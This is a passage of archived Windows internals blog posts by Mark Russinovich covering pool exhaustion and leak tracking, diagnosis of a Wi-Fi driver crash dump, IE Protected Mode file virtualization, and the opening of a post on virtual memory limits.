original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsPool_9AFB/image_thumb_7.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121116i8104138CE4189C8A" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> On one test system, I eventually saw this error message indicating that data had potentially been lost. I hope you never see this dialog on a real system! </P> <P> <IMG alt="image" border="0" height="108" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsPool_9AFB/image_thumb_19.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121117i1DE6A4ADBF92A1AC" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> Running out of paged pool causes similar errors. Here’s the result of trying to launch Notepad from a command prompt on a 32-bit Windows XP system after paged pool had run out. Note how Windows failed to redraw the window’s title bar and the different errors encountered for each attempt: </P> <P> <IMG alt="image" border="0" height="131" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsPool_9AFB/image_thumb_8.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121118i783C09F3B9B3FB1A" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="444" /> </P> <P> And here’s the start menu’s Accessories folder failing to populate on a 64-bit Windows Server 2008 system that’s out of paged pool: </P> <P> <IMG alt="image" border="0" height="59" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsPool_9AFB/image_thumb_9.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121119iB2869FDFB4061088" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="181" /> </P> <P> Here you can see the system commit level, also displayed on Process Explorer’s System Information dialog, quickly rise as Notmyfault leaks large chunks of paged pool and hits the 2GB maximum on a 2GB 32-bit Windows Server 2008 system: </P> <P> <IMG alt="image" border="0" height="84" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsPool_9AFB/image_thumb_11.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121120i0D0EC00BA0671C47" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="202" /> </P> <P> The reason that Windows doesn’t simply crash when pool is exhausted, even though the system is unusable, is that pool exhaustion can be a temporary condition caused by an extreme workload peak, after which pool is freed and the system returns to normal operation. When a driver (or the kernel) leaks pool, however, the condition is permanent and identifying the cause of the leak becomes important. That’s where the pool tags described at the beginning of the post come into play. </P> <H3> Tracking Pool Leaks </H3> <P> When you suspect a pool leak and the system is still able to launch additional applications, Poolmon, a tool in the <A href="#" target="_blank"> Windows Driver Kit </A> , shows you the number of allocations and outstanding bytes of allocation by type of pool and the tag passed into calls of ExAllocatePoolWithTag. Various hotkeys cause Poolmon to sort by different columns; to find the leaking allocation type, use either ‘b’ to sort by bytes or ‘d’ to sort by the difference between the number of allocations and frees. Here’s Poolmon running on a system where Notmyfault has leaked 14 allocations of about 100MB each: </P> <P> <IMG alt="image" border="0" height="192" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsPool_9AFB/image_thumb_17.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121121i99B71EE709F6EA16" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> After identifying the guilty tag in the left column, in this case ‘Leak’, the next step is finding the driver that’s using it. Since the tags are stored in the driver image, you can do that by scanning driver images for the tag in question. The <A href="#" target="_blank"> Strings </A> utility from Sysinternals dumps printable strings in the files you specify (that are by default a minimum of three characters in length), and since most device driver images are in the %Systemroot%\System32\Drivers directory, you can open a command prompt, change to that directory and execute “strings * | findstr &lt;tag&gt;”. After you’ve found a match, you can dump the driver’s version information with the Sysinternals <A href="#" target="_blank"> Sigcheck </A> utility. Here’s what that process looks like when looking for the driver using “Leak”: </P> <P> <IMG alt="image" border="0" height="263" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsPool_9AFB/image_thumb_13.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121122i2376754ED7DFAB89" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="444" /> </P> <P> If a system has crashed and you suspect that it’s due to pool exhaustion, load the crash dump file into the Windbg debugger, which is included in the Debugging Tools for Windows package, and use the !vm command to confirm it. Here’s the output of !vm on a system where Notmyfault has exhausted nonpaged pool: </P> <P> <IMG alt="image" border="0" height="221" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsPool_9AFB/image_thumb_15.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121123iA8FB8AA47B1260FB" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="434" /> </P> <P> Once you’ve confirmed a leak, use the !poolused command to get a view of pool usage by tag that’s similar to Poolmon’s. !poolused by default shows unsorted summary information, so specify 1 as the the option to sort by paged pool usage and 2 to sort by nonpaged pool usage: </P> <P> <IMG alt="image" border="0" height="142" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsPool_9AFB/image_thumb_16.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121124i9498129B3F6D6E86" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="344" /> </P> <P> Use Strings on the system where the dump came from to search for the driver using the tag that you find causing the problem. </P> <P> So far in this blog series I’ve covered the most fundamental limits in Windows, including physical memory, virtual memory, paged and nonpaged pool. Next time I’ll talk about the limits for the number of processes and threads that Windows supports, which are limits that derive from these. </P> </BODY></HTML> Thu, 27 Jun 2019 06:51:09 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/pushing-the-limits-of-windows-paged-and-nonpaged-pool/ba-p/723789 MarkRussinovich 2019-06-27T06:51:09Z The Case of the Crashed Phone Call https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-crashed-phone-call/ba-p/723768 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Dec 30, 2008 </STRONG> <BR /> <P> <A href="#" target="_blank"> David Solomon </A> , my coauthor for the <A href="#" target="_blank"> Windows Internals </A> books, was recently in the middle of an important VOIP call on Skype when the audio suddenly garbled. A second later the system blue screened. He called back after the reboot, but a half hour later the person on the other seemed to stop talking mid-word and the system crashed again. The conversation was essentially over anyway, and since he’d explained the first drop, Dave decided not to call back and formally end the call, but to investigate the cause of the crashes. He launched Windbg from the <A href="#" target="_blank"> Debugging Tools for Windows </A> package, selected Open Crash Dump from the File menu, and chose %Systemroot%\Memory.dmp. </P> <P> He’d previously configured Windbg to use the Microsoft public symbol server by entering “srv*c:\symbols*<A href="#" target="_blank">http://msdl.microsoft.com/download/symbols”</A> in the Windbg symbols configuration dialog, so Windbg knew how to interpret the crash dump file.&nbsp; When Windbg loads a crash dump file, it automatically executes a heuristics-based analysis engine that identifies the driver or system component most likely responsible for the crash. The analysis output pointed at the NETw4v64.sys device driver: </P> <P> <IMG alt="image" border="0" height="159" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheInterruptedPhoneCall_B31B/image_thumb_1.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121096iEED8188CDACA3403" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> </P> <P> When you click on the “!analyze –v” hyperlink in the output, Windbg prints out some of the data it uses in its analysis. The analysis heuristics aren’t perfect, so Dave always clicks the link to look at the additional data, specifically the stack trace at the time of the crash and possibly memory locations associated with the crash. The stack trace records the nesting of function calls on the processor from which the kernel’s crash function, <A href="#" target="_blank"> KeBugCheckEx </A> , was called. In this case the stack looked like this: </P> <P> <IMG alt="image" border="0" height="89" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheInterruptedPhoneCall_B31B/image_thumb_5.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121097i418811BAF75E35EB" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="254" /> </P> <P> You read the stack from bottom to top to follow the chronology of function calls. The trace shows that some code in NETw4v64 called the kernel’s (“nt”) <A href="#" target="_blank"> KeAcquireSpinLockRaiseToDpc </A> function. NETw4v64’s stack frame doesn’t have a text function name, which is expected for drivers that aren’t part of Windows and therefore don’t have symbols on the Microsoft symbol server. The next higher frame indicates that KeAcquireSpinLockRaiseToDpc called KiPageFault, most likely not directly, but as the result of a reference to a virtual memory address that wasn’t currently resident in physical memory. KiPageFault then called KeBugCheckEx with stop code A, which the extended analysis output describes as IRQL_NOT_LESS_OR_EQUAL: </P> <P> <IMG alt="image" border="0" height="145" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheInterruptedPhoneCall_B31B/image_thumb_3.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121099i0654361839CC9EDF" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> Dave hypothesized that the NETw4v64 driver had called the kernel with a corrupted pointer that triggered the invalid memory reference. This particular crash might have been the result of random corruption, even by another driver, so he looked in the %Systemroot%\Minidump directory for the dump file for the first crash. On Windows Vista, the operating system he was running, the system always saves a kernel-memory dump to %Systemroot%\Memory.dmp, overwriting the previous dump, and archives an abbreviated form of the dump, called a minidump, to %Systemroot%\Minidump. He followed the same steps for the second dump and the analysis engine reported the exact same cause for the crash, down to the same corrupted memory pointer value. </P> <P> Without performing a meticulous manual analysis of a dump, you can’t be certain that the driver the heuristics point at is the culprit, but the first rule of crash mitigation is to make sure you have the latest versions of any implicated drivers. Sometimes Windows Update has optional updates that don’t apply automatically, so Dave went to the %Systemroot%\System32\drivers directory to investigate the NETw4v64.sys file for clues as to what device it was for. The file properties dialog showed that it was version 11.5 of the “Intel Wireless WiFi Link Driver”: </P> <P> <IMG alt="image" border="0" height="281" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheInterruptedPhoneCall_B31B/image_thumb_6.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121100i1B9D955F4C06E3D5" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="381" /> </P> <P> Armed with the knowledge that it was an Intel wireless network driver, he opened Device Manager, expanded the Network Adapters node and found a device with a similar name: </P> <P> <IMG alt="image" border="0" height="98" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheInterruptedPhoneCall_B31B/image_thumb_7.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121101iEFD2C908E1FD527B" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="310" /> </P> <P> He right-clicked and chose “Update Driver Software…” from the context menu to launch the driver update wizard, and told it to check Windows Update for a newer version. Unfortunately, it reported that he had the most current version installed: </P> <P> <IMG alt="image" border="0" height="236" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheInterruptedPhoneCall_B31B/image_thumb_8.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121102i1C2FD95F0FEA33BD" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="466" /> </P> <P> Sometimes OEMs have drivers posted on their Web sites that they haven’t yet been made available to Windows Update, so Dave next went to Dell, the brand of his laptop, to check the version there. Again, the version he found posted was actually older than the one he had: </P> <P> <IMG alt="image" border="0" height="334" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheInterruptedPhoneCall_B31B/image_thumb_10.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121103i1393C7AD0D8ED9E8" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="486" /> </P> <P> OEMs often get hardware vendors to create custom versions of hardware tuned for specific cost, power, capability or size requirements. The original hardware vendor will therefore not post drivers for an OEM-only device or post drivers that are generic and might not take advantage of OEM-specific features.&nbsp; It’s always worth checking, though, so Dave went to Intel’s site. To his chagrin, not only was there a newer version that installed and worked as expected, but the Intel driver was version 12.1, a major release number higher than the one Dell was hosting: </P> <P> <IMG alt="image" border="0" height="300" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheInterruptedPhoneCall_B31B/image_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121104i9639E1813DDEFBDF" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> </P> <P> </P> <P> </P> <P> </P> <P> </P> <P> </P> <P> </P> <P> </P> <P> </P> <P> Intel also conveniently offered the driver in a “Drivers-Only” download that was a mere 7MB, one tenth the size of the package on Dell’s site that also includes value-add management software. </P> <P> Dave couldn’t conclusively close the case because he couldn’t be sure that the Intel driver was the actual cause of the crashes, but the crashes haven’t reoccurred. Even if the Intel driver wasn’t the root cause, Dave was happy that he picked up a newer version that most likely had performance, reliability and maybe even power-management improvements. The case is a great example of simple dump analysis and the lesson that Windows Update and even an OEM’s site might not have the most up-to-date drivers. Hopefully, Dell will start leveraging Windows Update to provide its customers the latest drivers. </P> </BODY></HTML> Thu, 27 Jun 2019 06:48:53 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-crashed-phone-call/ba-p/723768 MarkRussinovich 2019-06-27T06:48:53Z The Case of the Phantom Desktop Files https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-phantom-desktop-files/ba-p/723757 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Dec 28, 2008 </STRONG> <BR /> <P> A few weeks ago, my wife mentioned that she sometimes saw files in her desktop folder that didn’t appear on the actual desktop. She brought it up not only because she was confused by the discrepancy, but because she wanted to move some of these phantom files to other folders and wanted to delete others. I had no idea what she was talking about (which was usually the case when she described her computer troubles), so I told her that the next time she saw these mysterious files, to call me to look at it. </P> <P> A few days later I got home from work and she greeted me excitedly at the door and explained that the problem reoccurred and that she had left a window open showing the elusive files. I rushed to the kitchen computer with anticipation, not even bothering to greet the dogs on the way, and surveyed the situation. She had a maximized IE window open with a full row of tabs for her open emails (I don’t think she ever closes an email window). An IE “Choose a File” dialog box was in the foreground listing the files in her desktop folder, which she had opened by clicking the attachment button in the email editor. The dialog looked like this: </P> <P> <IMG alt="image" border="0" height="245" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseofthePhantomDesktopFiles_4A85/image_thumb_4.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121090i7240C35E79A22D02" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="420" /> </P> <P> I minimized IE to view the desktop background and sure enough, several of the files visible in the dialog, such as the “Maui Feb. 08” folder and the CIMG13xx JPG files, were missing. I opened an Explorer window and navigated to her desktop folder to see if the files would show up there, but they were missing there as well: </P> <P> <IMG alt="image" border="0" height="265" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseofthePhantomDesktopFiles_4A85/image_thumb_2.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121091i502F6EF25A625CBA" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="422" /> </P> <P> I’d never seen that behavior before. I knew this was a job for <A href="#" target="_blank"> Process Monitor </A> . Since my wife doesn’t keep the Sysinternals tools on her system (sad, but true), I ran it directly from the network using the Sysinternals Live address, <A target="_blank"> \\live.sysinternals.com\tools\procmon.exe </A> . With Process Monitor recording activity, I closed and reopened the Choose File dialog from the email editor and then I search for “CIMG”, a portion of the file name for many of the files present in the Choose File dialog, but not in the Explorer view of the desktop. The first hit was a directory enumeration operation with the file names showing as results in the Details column on the far right: </P> <P> <IMG alt="image" border="0" height="72" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseofthePhantomDesktopFiles_4A85/image_thumb_12.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121092i2DED37C31D135176" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> The files were located in her profile under \Appdata\Local\Microsoft\Windows\Temporary Internet Files\Virtualized\C\Users\Daryl\Desktop. This Virtualized is directory created by IE7 when run in Protected Mode (PMIE), which is the default mode on Windows Vista and Windows Server 2008. </P> <P> PMIE uses Integrity Levels, introduced in Vista and Server 2008, to limit the file system and registry locations to which code running in IE can modify to a subset of those writeable by the user account in which IE executes. As I described in an <A href="#" target="_blank"> earlier blog post </A> , the sandbox defined by locations labeled with Low Integrity, the level at which PMIE executes and of the objects that PMIE can modify, allow PMIE to save favorites and temporary files, like the IE cache and browsing history. However, PMIE cannot modify other locations in a user’s account, like documents folders and per-user autostart locations in the registry and file system, because they have an integrity level of Medium. That prevents drive-by-download malware that might infect the IE process from establishing a persistent presence. </P> <P> In order to preserve backward compatibility with legacy code, such as ActiveX controls and Browser Helper Objects, that might be coded to write to locations outside of the sandbox, PMIE implements <EM> shims </EM> that intercepts file and registry operations and redirects ones that got outside the sandbox to the Virtualized directory within it. </P> <P> To see if that was what was happening here, I examined the stack trace of the virtualized operation highlighted above by right-clicking on the line and choosing Stack. The stack showed that Acredir.dll was intercepting the operation and executing redirection functions: </P> <P> <IMG alt="image" border="0" height="198" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseofthePhantomDesktopFiles_4A85/image_thumb_10.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121093i9CBB0BABB341C6B0" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="391" /> </P> <P> Double-clicking on the line in the stack trace opens the module properties dialog, which shows that the DLL is the “Windows Compatibility DLL”, thus confirming this was part of PMIE’s sandbox implementation: </P> <P> <IMG alt="image" border="0" height="140" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseofthePhantomDesktopFiles_4A85/image_thumb_13.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121094i089876EBC5E1858C" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="244" /> </P> <P> I had been familiar with PMIE’s virtualization, but I’d never seen files virtualized on the desktop, so it had not been obvious to me that was what was causing the discrepancy. Process Monitor revealed the cause, so now all I was left with was cleaning up the virtualized files. Most users don’t realize that you can move and delete files from within a file browse dialog, so I took the opportunity to show my wife how she can manage virtualized files from the email editor’s attachment dialog if she came across them again. We deleted the files she didn’t want and moved the pictures out to her photo library folders. </P> <P> The case was closed. As a bonus, my wife was impressed at the ease with which I’d figured out the source of the phantom files and even more impressed that I wrote the tool I used to solve it. She’d also gotten an in depth look at PMIE’s virtualization and integrity levels, but I think in the end my lecturing on those subjects actually subtracted points. </P> <P> Incidentally, you’ll almost certainly see files and directories if you look at the PMIE Virtualized folder in your profile, because even routine operations within IE result in redirection. Here you can see thumbnail cache files that the shell’s file browsing dialog creates when you use it from within IE. Normally, the shell stores thumbnail cache files in your profile, but PMIE can’t write to that location so the shim virtualizes it: </P> <P> <IMG alt="image" border="0" height="246" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseofthePhantomDesktopFiles_4A85/image_thumb_9.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121095iDB695A46D4C70C81" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="443" /> </P> </BODY></HTML> Thu, 27 Jun 2019 06:47:54 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-phantom-desktop-files/ba-p/723757 MarkRussinovich 2019-06-27T06:47:54Z Pushing the Limits of Windows: Virtual Memory https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/pushing-the-limits-of-windows-virtual-memory/ba-p/723750 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Nov 17, 2008 </STRONG> <BR /> <P> In my <A href="#" target="_blank"> first Pushing the Limits of Windows post </A> , I discussed physical memory limits, including the limits imposed by licensing, implementation, and driver compatibility. Here’s the index of the entire Pushing the Limits series. While they can stand on their own, they assume that you read them in order. </P> <BLOCKQUOTE> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Physical Memory </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Virtual Memory </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Paged and Nonpaged Pool </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Processes and Threads </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Handles </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: USER and GDI Objects – Part 1 </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: USER and GDI Objects – Part 2 </A> </P> </BLOCKQUOTE> <P> This time I’m turning my attention to another fundamental resource, virtual memory. Virtual memory separates a program’s view of memory from the system’s physical memory, so an operating system decides when and if to store the program’s code and data in physical memory and when to store it in a file. The major advantage of virtual memory is that it allows more processes to execute concurrently than might otherwise fit in physical memory. </P> <P> While virtual memory has limits that are related to physical memory limits, virtual memory has limits that derive from different sources and that are different depending on the consumer. For example, there are virtual memory limits that apply to individual processes that run applications, the operating system, and for the system as a whole. It's important to remember as you read this that virtual memory, as the name implies, has no direct connection with physical memory. Windows assigning the file cache a certain amount of virtual memory does not dictate how much file data it actually caches in physical memory; it can be any amount from none to more than the amount that's addressable via virtual memory. </P> <H3> Process Address Spaces </H3> <P> Each process has its own virtual memory, called an address space, into which it maps the code that it executes and the data that the code references and manipulates. A 32-bit process uses 32-bit virtual memory address pointers, which creates an absolute upper limit of 4GB (2^32) for the amount of virtual memory that a 32-bit process can address. However, so that the operating system can reference its own code and data and the code and data of the currently-executing process without changing address spaces, the operating system makes its virtual memory visible in the address space of every process. By default, 32-bit versions of Windows split the process address space evenly between the system and the active process, creating a limit of 2GB for each: </P> <P> <IMG alt="image" border="0" height="200" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsVirtualMemory_917D/image_thumb_12.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121067i95D4CE1B8C0ED06F" width="93" /> </P> <P> Applications might use Heap APIs, the .NET garbage collector, or the C runtime malloc library to allocate virtual memory, but under the hood all of these rely on the <A href="#" target="_blank"> VirtualAlloc </A> API. When an application runs out of address space then VirtualAlloc, and therefore the memory managers layered on top of it, return errors (represented by a NULL address). The Testlimit utility, which I wrote for the <A href="#" target="_blank"> 4th Edition of Windows Internals </A> to demonstrate various Windows limits,&nbsp; calls VirtualAlloc repeatedly until it gets an error when you specify the –r switch. Thus, when you run the 32-bit version of Testlimit on 32-bit Windows, it will consume the entire 2GB of its address space: </P> <P> <IMG alt="image" border="0" height="129" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsVIrtualMemory_F6E0/image_thumb_9.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121068i185FA5558E6E6F08" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="471" /> </P> <P> 2010 MB isn’t quite 2GB, but Testlimit’s other code and data, including its executable and system DLLs, account for the difference. You can see the total amount of address space it’s consumed by looking at its Virtual Size in <A href="#" target="_blank"> Process Explorer </A> : </P> <P> <IMG alt="image" border="0" height="50" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsVIrtualMemory_F6E0/image_thumb_4.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121069iA99B9D52C3DEE722" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="345" /> </P> <P> Some applications, like SQL Server and Active Directory, manage large data structures and perform better the more that they can load into their address space at the same time. Windows NT 4 SP3 therefore introduced a boot option, <A href="#" target="_blank"> /3GB </A> , that gives a process 3GB of its 4GB address space by reducing the size of the system address space to 1GB, and Windows XP and Windows Server 2003 introduced the /userva option that moves the split anywhere between 2GB and 3GB: </P> <P> <IMG alt="image" border="0" height="200" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsVirtualMemory_917D/image_thumb_13.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121070i0F520FE2533518DC" width="93" /> </P> <P> To take advantage of the address space above the 2GB line, however, a process must have the ‘large address space aware’ flag set in its executable image. Access to the additional virtual memory is opt-in because some applications have assumed that they’d be given at most 2GB of the address space. Since the high bit of a pointer referencing an address below 2GB is always zero, they would use the high bit in their pointers as a flag for their own data, clearing it of course before referencing the data. If they ran with a 3GB address space they would inadvertently truncate pointers that have values greater than 2GB, causing program errors including possible data corruption. </P> <P> All Microsoft server products and data intensive executables in Windows are marked with the large address space awareness flag, including Chkdsk.exe, Lsass.exe (which hosts Active Directory services on a domain controller), Smss.exe (the session manager), and Esentutl.exe (the Active Directory Jet database repair tool). You can see whether an image has the flag with the Dumpbin utility, which comes with Visual Studio: </P> <P> <IMG alt="image" border="0" height="325" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsVirtualMemory_917D/image_thumb_4.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121071iFB8D2643B59D5BE8" style="border-right-width: 0px; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" width="554" /> </P> <P> Testlimit is also marked large-address aware, so if you run it with the –r switch when booted with the 3GB of user address space, you’ll see something like this: </P> <P> <IMG alt="image" border="0" height="126" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsVIrtualMemory_F6E0/image_thumb_6.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121072i38190EE69260CC9F" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="469" /> </P> <P> Because the address space on 64-bit Windows is much larger than 4GB, something I’ll describe shortly, Windows can give 32-bit processes the maximum 4GB that they can address and use the rest for the operating system’s virtual memory. If you run Testlimit on 64-bit Windows, you’ll see it consume the entire 32-bit addressable address space: </P> <P> <IMG alt="image" border="0" height="128" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsVIrtualMemory_F6E0/image_thumb_11.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121073i6F792A8D53DE6213" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="468" /> </P> <P> 64-bit processes use 64-bit pointers, so their theoretical maximum address space is 16 exabytes (2^64). However, Windows doesn’t divide the address space evenly between the active process and the system, but instead defines a region in the address space for the process and others for various system memory resources, like system page table entries (PTEs), the file cache, and paged and non-paged pools. </P> <P> The size of the process address space is different on IA64 and x64 versions of Windows where the sizes were chosen by balancing what applications need against the memory costs of the overhead (page table pages and translation lookaside buffer - TLB - entries) needed to support the address space. On x64, that’s 8192GB (8TB) and on IA64 it’s 7168GB (7TB - the 1TB difference from x64 comes from the fact that the top level page directory on IA64 reserves slots for Wow64 mappings). On both IA64 and x64 versions of Windows, the size of the various resource address space regions is 128GB (e.g. non-paged pool is assigned 128GB of the address space), with the exception of the file cache, which is assigned 1TB. The address space of a 64-bit process therefore looks something like this: </P> <P> <IMG alt="image" border="0" height="200" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsVIrtualMemory_F6E0/image_thumb_2.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121074i7440488C8B3F2083" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="90" /> </P> <P> The figure isn’t drawn to scale, because even 8TB, much less 128GB, would be a small sliver. Suffice it to say that like our universe, there’s a lot of emptiness in the address space of a 64-bit process. </P> <P> When you run the 64-bit version of Testlimit (Testlimit64) on 64-bit Windows with the –r switch, you’ll see it consume 8TB, which is the size of the part of the address space it can manage: </P> <P> <IMG alt="image" border="0" height="122" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsVIrtualMemory_F6E0/image_thumb_12.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121075i1D9942905F21EFC3" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="473" /> </P> <P> <IMG alt="image" border="0" height="47" 